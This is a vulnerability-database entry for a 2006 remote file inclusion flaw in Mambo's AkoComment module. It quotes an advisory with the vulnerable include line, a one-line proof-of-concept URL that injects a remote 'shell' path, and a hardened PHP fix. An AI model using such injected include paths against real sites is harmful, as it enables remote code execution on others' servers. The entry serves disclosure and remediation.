Mambo AkoComment Module mosConfig_absolute_path Parameter Remote File Inclusion Vulnerability

Vulnerability ID: 1193773
Vulnerability type: Input validation
Published: 2006-08-21
Updated: 2006-08-26
CVE ID: CVE-2006-4281
CNNVD ID: CNNVD-200608-334
Platform: N/A
CVSS score: 7.5
|Vulnerability sources
https://cxsecurity.com/issue/WLB-2006080144
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-334
|Vulnerability details
The akocomments.php script in the AkoComment 1.1 module (com_akocomment) for Mambo 4.5 contains a PHP remote file inclusion vulnerability. A remote attacker can execute arbitrary PHP code by supplying a URL in the mosConfig_absolute_path parameter.
|Exploit
###########################################################################################
#			Aria-Security.net Advisory                                        #
#			Discovered  by: O.U.T.L.A.W                                       #
#			< www.Aria-security.net >                                      	  #
#		Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                      	  #
#		                                  		    			  #
###########################################################################################

#Software:   	Ako Comments (mod)
#Attack method: Remote File Inclusion
#Source:
#Description: This module shows users' comments from component AkoComments.
#File Version: 1.1 for Mambo 4.5

include_once($mosConfig_absolute_path.'/components/com_akocomment/languages/'.$mosConfig_lang.'.php');

************************************************************************************

#Proof of Concept:
#http://www.site.com/akocomments.php?mosConfig_absolute_path=shell
#
#----------------------------------------------------------
#
#
#Contact : Outlaw (at) aria-security (dot) net [email concealed]
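As an added illustration (not part of the advisory above or of the AkoComment project), the vulnerable include pattern from the advisory placed beside a hardened equivalent. The function names, the language allow-list and the assumption that `$basePath` comes from the Mambo bootstrap rather than from request data are mine.

```php
<?php
// Added example: the include pattern quoted in the advisory, and a hardened
// version. Names other than those on the page are hypothetical.

// --- Vulnerable (the behaviour the advisory describes) ---
// With register_globals enabled, any request parameter named
// mosConfig_absolute_path becomes this global before the script runs, so a
// URL value makes include_once fetch a remote script whenever PHP's
// allow_url_fopen (and, on PHP 5.2+, allow_url_include) permits it.
function vulnerable_language_include()
{
    global $mosConfig_absolute_path, $mosConfig_lang;
    include_once($mosConfig_absolute_path.'/components/com_akocomment/languages/'.$mosConfig_lang.'.php');
}

// --- Hardened ---
// 1. Refuse direct access. Mambo components conventionally check the
//    _VALID_MOS constant that the core defines while bootstrapping, so a
//    script requested directly stops here before any include runs.
defined('_VALID_MOS') or die('Direct access not permitted.');

// 2. Take the base path from the bootstrap (assumed here to be passed in by
//    the caller from configuration), never from a request-controlled global.
// 3. Restrict the language name to a fixed allow-list and verify that the
//    resolved file still lies inside the languages directory.
function hardened_language_include($basePath, $lang)
{
    $allowed = array('english', 'german', 'french');  // constructed allow-list
    if (!in_array($lang, $allowed, true)) {
        $lang = 'english';  // fall back instead of trusting the input
    }
    $dir  = realpath($basePath.'/components/com_akocomment/languages');
    $file = realpath($dir.'/'.$lang.'.php');
    // realpath() returns false for missing paths and collapses "..", so a
    // prefix check against the directory catches traversal and URL wrappers.
    if ($dir === false || $file === false
        || strncmp($file, $dir.DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return false;  // not a local file inside the languages directory
    }
    include_once $file;
    return true;
}
```

The hardened version also removes the dependency on register_globals entirely, which is the root cause here: the fix is not to sanitise `$mosConfig_absolute_path` but to stop reading it from a variable the request can populate.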
|References

Source: XF
Name: akocomment-akocomments-file-include(28458)
Link: http://xforce.iss.net/xforce/xfdb/28458

Source: BID
Name: 19602
Link: http://www.securityfocus.com/bid/19602

Source: BUGTRAQ
Name: 20060819 AkoComments (mod) Remote File Inclusion
Link: http://www.securityfocus.com/archive/1/443748

Source: SREASON
Name: 1435
Link: http://securityreason.com/securityalert/1435